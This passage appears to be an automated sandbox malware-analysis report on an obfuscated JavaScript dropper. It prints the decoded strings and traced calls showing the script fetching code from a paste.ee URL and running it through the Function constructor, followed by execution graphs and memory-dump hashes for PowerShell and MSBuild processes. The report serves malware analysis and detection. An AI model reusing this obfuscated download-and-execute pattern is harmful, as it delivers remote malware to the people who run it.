xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8e\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8/\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8d\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8/\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8f\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8a\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa87\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8O\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8M\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8k\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa82\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa80\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8/\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa80".split("\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8") ➔ h,t,t,p,:,/,/,p,a,s,t,e,.,e,e,/,d,/,f,a,7,O,M,k,2,0,/,0
                                                                                                                                    • h,t,t,p,:,/,/,p,a,s,t,e,.,e,e,/,d,/,f,a,7,O,M,k,2,0,/,0.join("") ➔ "http://paste.ee/d/fa7OMk20/0"
                                                                                                                                    • Show all Function Runs
                                                                                                                                    3
                                                                                                                                    var pyrry = "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28open\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8open\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8".split("\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8") ➔ ,open,
                                                                                                                                    • ,open,.join("") ➔ "open"
                                                                                                                                    • Show all Function Runs
                                                                                                                                    4
                                                                                                                                    var alebench = "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28send\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8send\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8".split("\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8") ➔ ,send,
                                                                                                                                    • ,send,.join("") ➔ "send"
                                                                                                                                    • Show all Function Runs
                                                                                                                                    5
                                                                                                                                    var tentaculicyst = "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28responseText\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8responseText\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8".split("\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8") ➔ ,responseText,
                                                                                                                                    • ,responseText,.join("") ➔ "responseText"
                                                                                                                                    • Show all Function Runs
                                                                                                                                    6
                                                                                                                                    var batholith = "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28Function\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28".split ( "\x115f\x0efe\x0ab5\x0dd2\x068e\x2896\x046a\x2ab4\x2924\x078c\x10e5i\x254b\x2c60\x2e28" ).join ( "" );
                                                                                                                                    • "\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8Function\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8".split("\xe1\x2026\x0178\xe0\xbb\xbe\xe0\xaa\xb5\xe0\xb7\x2019\xda\x017d\xe2\xa2\x2013\xd1\xaa\xe2\xaa\xb4\xe2\xa4\xa4\xde\x0152\xe1\x0192\xa5i\xe2\x2022\x2039\xe2\xb1\xa0\xe2\xb8\xa8") ➔ ,Function,
                                                                                                                                    • ,Function,.join("") ➔ "Function"
                                                                                                                                    • Show all Function Runs
                                                                                                                                    7
                                                                                                                                    Shumen[pyrry] ( "GET", basketcases, false );
                                                                                                                                    • open("GET","http://paste.ee/d/fa7OMk20/0",false) ➔ undefined
                                                                                                                                    8
                                                                                                                                    Shumen[alebench] ( );
                                                                                                                                    • send() ➔ undefined
                                                                                                                                    9
                                                                                                                                    new this[batholith] ( Shumen[tentaculicyst] ) ( );
                                                                                                                                    • () ➔ undefined

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage

                                                                                                                                    Dynamic/Packed Code Coverage

                                                                                                                                    Signature Coverage

                                                                                                                                    Execution Coverage:2.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:4
                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                    Show Legend
                                                                                                                                    Hide Nodes/Edges
                                                                                                                                    execution_graph 6561 7ff88a8ab938 6564 7ff88a8b3947 CreateProcessW 6561->6564 6563 7ff88a8ab8f2 6565 7ff88a8b39d0 6564->6565 6565->6563

                                                                                                                                    Executed Functions

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 80 7ff88a972e28-7ff88a972ea9 84 7ff88a972eaf-7ff88a972eb9 80->84 85 7ff88a972fd6-7ff88a973032 80->85 86 7ff88a972ebb-7ff88a972ed0 84->86 87 7ff88a972ed2-7ff88a972ed7 84->87 110 7ff88a97305d-7ff88a973087 85->110 111 7ff88a973034-7ff88a97305b 85->111 86->87 89 7ff88a972edd-7ff88a972ee0 87->89 90 7ff88a972f73-7ff88a972f7d 87->90 92 7ff88a972f29 89->92 93 7ff88a972ee2-7ff88a972ef5 89->93 95 7ff88a972f8e-7ff88a972fd3 90->95 96 7ff88a972f7f-7ff88a972f8d 90->96 97 7ff88a972f2b-7ff88a972f2d 92->97 93->85 106 7ff88a972efb-7ff88a972f05 93->106 95->85 97->90 101 7ff88a972f2f-7ff88a972f32 97->101 101->90 105 7ff88a972f34-7ff88a972f4a 101->105 116 7ff88a972f4c-7ff88a972f59 105->116 117 7ff88a972f63-7ff88a972f72 105->117 108 7ff88a972f1e-7ff88a972f27 106->108 109 7ff88a972f07-7ff88a972f14 106->109 108->97 109->108 118 7ff88a972f16-7ff88a972f1c 109->118 125 7ff88a97308e-7ff88a97309f 110->125 126 7ff88a973089 110->126 111->110 116->117 123 7ff88a972f5b-7ff88a972f61 116->123 118->108 123->117 130 7ff88a9730a6-7ff88a97313f 125->130 131 7ff88a9730a1 125->131 126->125 128 7ff88a97308b 126->128 128->125 136 7ff88a9732d9-7ff88a973337 130->136 137 7ff88a973145-7ff88a97314f 130->137 131->130 132 7ff88a9730a3 131->132 132->130 161 7ff88a973339-7ff88a973360 136->161 162 7ff88a973362-7ff88a973385 136->162 138 7ff88a973169-7ff88a97316f 137->138 139 7ff88a973151-7ff88a97315f 137->139 142 7ff88a97326e-7ff88a973278 138->142 143 7ff88a973175-7ff88a973178 138->143 139->138 145 7ff88a973161-7ff88a973167 139->145 146 7ff88a97327a-7ff88a97328a 142->146 147 7ff88a97328b-7ff88a9732d6 142->147 148 7ff88a97317a-7ff88a97318d 143->148 149 7ff88a9731c1 143->149 145->138 147->136 148->136 160 7ff88a973193-7ff88a97319d 148->160 151 7ff88a9731c3-7ff88a9731c5 149->151 151->142 154 7ff88a9731cb-7ff88a9731ce 151->154 154->142 158 7ff88a9731d2-7ff88a9731d7 154->158 158->142 163 7ff88a9731dd-7ff88a9731e9 158->163 164 7ff88a97319f-7ff88a9731b4 160->164 165 7ff88a9731b6-7ff88a9731bf 160->165 161->162 176 7ff88a973387-7ff88a97338d 162->176 177 7ff88a973391-7ff88a97339d 162->177 163->158 170 7ff88a9731eb-7ff88a97321b 163->170 164->165 165->151 170->142 184 7ff88a97321d-7ff88a973223 170->184 176->177 178 7ff88a97339f-7ff88a9733a5 177->178 179 7ff88a9733a9-7ff88a9733b9 177->179 178->179 179->176 182 7ff88a9733bb-7ff88a9733e0 179->182 186 7ff88a973225-7ff88a973240 184->186 187 7ff88a973242-7ff88a973258 184->187 186->187 190 7ff88a97325e-7ff88a97326d 187->190
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583912769.00007FF88A970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A970000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a970000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 011c0aa564910bd1349248ccfc86826f4be8d02e7be43e585017a4b8d30a50c5
                                                                                                                                    • Instruction ID: dde6d365e4c148c94e2dc9efe4773f5620ddb40597a48d4fc1c577bece7c9a62
                                                                                                                                    • Opcode Fuzzy Hash: 011c0aa564910bd1349248ccfc86826f4be8d02e7be43e585017a4b8d30a50c5
                                                                                                                                    • Instruction Fuzzy Hash: 45222621A0EBC95FE3569A289C592B57BE1FF46260B0841FFD45DC71D3DE18AC06C3A2

                                                                                                                                    Control-flow Graph

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583912769.00007FF88A970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A970000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a970000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: r6y$r6y
                                                                                                                                    • API String ID: 0-2250052535
                                                                                                                                    • Opcode ID: 6ede4a1a0ab541f7e50d62f5424ca67728dceb3566b1b98ddd438132a26f572f
                                                                                                                                    • Instruction ID: d9fbc03b0bcbb7c2ceb7a060abf098f13645962975c65800d0de93cd6fba5fba
                                                                                                                                    • Opcode Fuzzy Hash: 6ede4a1a0ab541f7e50d62f5424ca67728dceb3566b1b98ddd438132a26f572f
                                                                                                                                    • Instruction Fuzzy Hash: AB313C32F1DD990FFBA59A5CAC192F9B3D1FFA4690B5801F6C41EC31D5DE18A8128391

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583205795.00007FF88A8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A8A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a8a0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: 04989912e9650e0cfa56c0190a299e7c47df4146a9177ef527353b11c7720c56
                                                                                                                                    • Instruction ID: 40f2b6fe6655448a8f74ba9ab5342afe187fe25b187902a72c43540c92e18627
                                                                                                                                    • Opcode Fuzzy Hash: 04989912e9650e0cfa56c0190a299e7c47df4146a9177ef527353b11c7720c56
                                                                                                                                    • Instruction Fuzzy Hash: AC411A31A08A6D8FDBA4EB18D854BE9B7F0FB59310F0001EAD44DE3291DB75AA81CF41

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 72 7ff88a972c9d-7ff88a972cb9 74 7ff88a972cc0-7ff88a972cc9 72->74 75 7ff88a972ccb-7ff88a972cd8 74->75 76 7ff88a972ce2-7ff88a972cef 74->76 75->76 78 7ff88a972cda-7ff88a972ce0 75->78 78->76
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583912769.00007FF88A970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A970000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a970000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: r6y
                                                                                                                                    • API String ID: 0-3142403458
                                                                                                                                    • Opcode ID: bf589bd9ba46f9c3634f703d9fe17af10b3f365ef3d6bc58de0c096c41885bb9
                                                                                                                                    • Instruction ID: ec9c0918ce39211c29122230bc32987aafea08af00864482a98de06cbb2f1e5e
                                                                                                                                    • Opcode Fuzzy Hash: bf589bd9ba46f9c3634f703d9fe17af10b3f365ef3d6bc58de0c096c41885bb9
                                                                                                                                    • Instruction Fuzzy Hash: 8FF02422F1E9D91BA7A4AA6C7C192F463D1FFA59A0B1C02F6C81DC3186DC085C164381

                                                                                                                                    Control-flow Graph

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583912769.00007FF88A970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A970000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a970000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cd2c880f4a940415911ebdb22fa1bea8062042572c33f0facc70ebf15b20e2b6
                                                                                                                                    • Instruction ID: 64a7c21aa93329a7ac9a947b406883eb984db734b1f8639642769707f58891f4
                                                                                                                                    • Opcode Fuzzy Hash: cd2c880f4a940415911ebdb22fa1bea8062042572c33f0facc70ebf15b20e2b6
                                                                                                                                    • Instruction Fuzzy Hash: 7061F722F0FAC61FE7959A6C5C692B5A2D2FF55690F6801FAC41DC71E3EE0C9806C351

                                                                                                                                    Control-flow Graph

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583912769.00007FF88A970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A970000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a970000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 71ee6ea31256c5688007a382b27ad77653f3848299609c209b731daa144b2ec1
                                                                                                                                    • Instruction ID: a7cd2064878b741712c67eff12870bbe7ba23f246483177569e6d5c25f9b09e0
                                                                                                                                    • Opcode Fuzzy Hash: 71ee6ea31256c5688007a382b27ad77653f3848299609c209b731daa144b2ec1
                                                                                                                                    • Instruction Fuzzy Hash: E141C522E1FAC71BF7959A684C692B556D2FF516E1F6801F9C41DC71F2EE0C9C06C212

                                                                                                                                    Non-executed Functions

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583205795.00007FF88A8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A8A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a8a0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 15a39fa6437b56073d66bd842333846db334ef7f089ca8ae8a35129fc0fe95f0
                                                                                                                                    • Instruction ID: 8b77a9b7d454f442ddadc1fcf28b5ef76267ecff89d49064a746dbef4a85518a
                                                                                                                                    • Opcode Fuzzy Hash: 15a39fa6437b56073d66bd842333846db334ef7f089ca8ae8a35129fc0fe95f0
                                                                                                                                    • Instruction Fuzzy Hash: 6601B130A0E6896FE7169B24D9546ECB7B4FB42380F0441B6C805D72D2DE7C7919D762
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.1583205795.00007FF88A8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88A8A0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_7ff88a8a0000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a62ea21a86f219c4b0c5854a5f55d5d822b0bf7b9dfdbec7511343b7ce3e9dcb
                                                                                                                                    • Instruction ID: 997310e453358c695885c4ce126f12fc0090f40240e2df2c2d5642aea1014e86
                                                                                                                                    • Opcode Fuzzy Hash: a62ea21a86f219c4b0c5854a5f55d5d822b0bf7b9dfdbec7511343b7ce3e9dcb
                                                                                                                                    • Instruction Fuzzy Hash: C9F0AF30E0E64DAAE7249A64E9447FCB3B5FB46380F000275C805932C1EE78B514D652

                                                                                                                                    Executed Functions

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: N
                                                                                                                                    • API String ID: 0-1130791706
                                                                                                                                    • Opcode ID: 0fd2a6b6e149417ba82214560f8d8400a88cd29944c5f64e098fa34f38bdfeba
                                                                                                                                    • Instruction ID: 1961d912434bc1e9923697975d0ca801e9ed5262914424cfd6c82d108516220c
                                                                                                                                    • Opcode Fuzzy Hash: 0fd2a6b6e149417ba82214560f8d8400a88cd29944c5f64e098fa34f38bdfeba
                                                                                                                                    • Instruction Fuzzy Hash: C473D331C1075A8EDB11EF68C844AD9F7B1FF99300F11969AE4597B221EB70AAC5CF81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 77191072551467886c61bb52de82f69b25fd46abd061665d08e8b4406cd71ed2
                                                                                                                                    • Instruction ID: 2f84d601edb05cb5627a1829356bf8b170ef3a198059ab5efb3f981c40a8b436
                                                                                                                                    • Opcode Fuzzy Hash: 77191072551467886c61bb52de82f69b25fd46abd061665d08e8b4406cd71ed2
                                                                                                                                    • Instruction Fuzzy Hash: 04621D728153578ECB0BCF28C5D7A85FFB9EF9331071A95C6C8848F1A6C760A686CB15
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 06d2a0eb95e501bc6a2dab8a7a73c67feb5bc35123f15eeff1e406b341ea1606
                                                                                                                                    • Instruction ID: a57994fcc5b99958bfdea3c03d3e222e82cda670c6ae54e93e2571553f45c654
                                                                                                                                    • Opcode Fuzzy Hash: 06d2a0eb95e501bc6a2dab8a7a73c67feb5bc35123f15eeff1e406b341ea1606
                                                                                                                                    • Instruction Fuzzy Hash: 0A917F30F00258DBDB1DDFB888552BEBBA3AFC8700B19856ED406E7385DE348852C791
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e564026b876773ae291b54a31774d33a1f86da6d55ce5c8164b1131cbe56d68f
                                                                                                                                    • Instruction ID: ede9b7daf3c9694fad86aba91ec223018f5e80eca9c67f4e6f2a9724e56b932f
                                                                                                                                    • Opcode Fuzzy Hash: e564026b876773ae291b54a31774d33a1f86da6d55ce5c8164b1131cbe56d68f
                                                                                                                                    • Instruction Fuzzy Hash: FCC1AF74E01218CFDB55DFA5D984B9DBBB2FF88304F2081A9D809A7365DB35AA85CF10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a3984fbec17ec3f4ea4626e96c73be09639ea465217fa701111e0b2adf68d060
                                                                                                                                    • Instruction ID: 8b8bf08940e0901463ad686761e611bcf16a9f0a898aa7f54f466eb3a29fb130
                                                                                                                                    • Opcode Fuzzy Hash: a3984fbec17ec3f4ea4626e96c73be09639ea465217fa701111e0b2adf68d060
                                                                                                                                    • Instruction Fuzzy Hash: F2A1F471D106198EDB15DFA9C8447DDFBB1EF89304F10C6AAE458AB260EB709AC5CF41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ee068693a722af6ee44def2233381e00f13612b0b383d21ca8c9c59e16238bb0
                                                                                                                                    • Instruction ID: 3051dcb9db84848744136b149259fed6f2924ed9e57ef009adf81a31a9593ced
                                                                                                                                    • Opcode Fuzzy Hash: ee068693a722af6ee44def2233381e00f13612b0b383d21ca8c9c59e16238bb0
                                                                                                                                    • Instruction Fuzzy Hash: A1A1E170D00208CFEB14DFA9C948BDDBBB1FF89305F208269E509AB2A5DB759985CF54
                                                                                                                                    Memory Dump Source
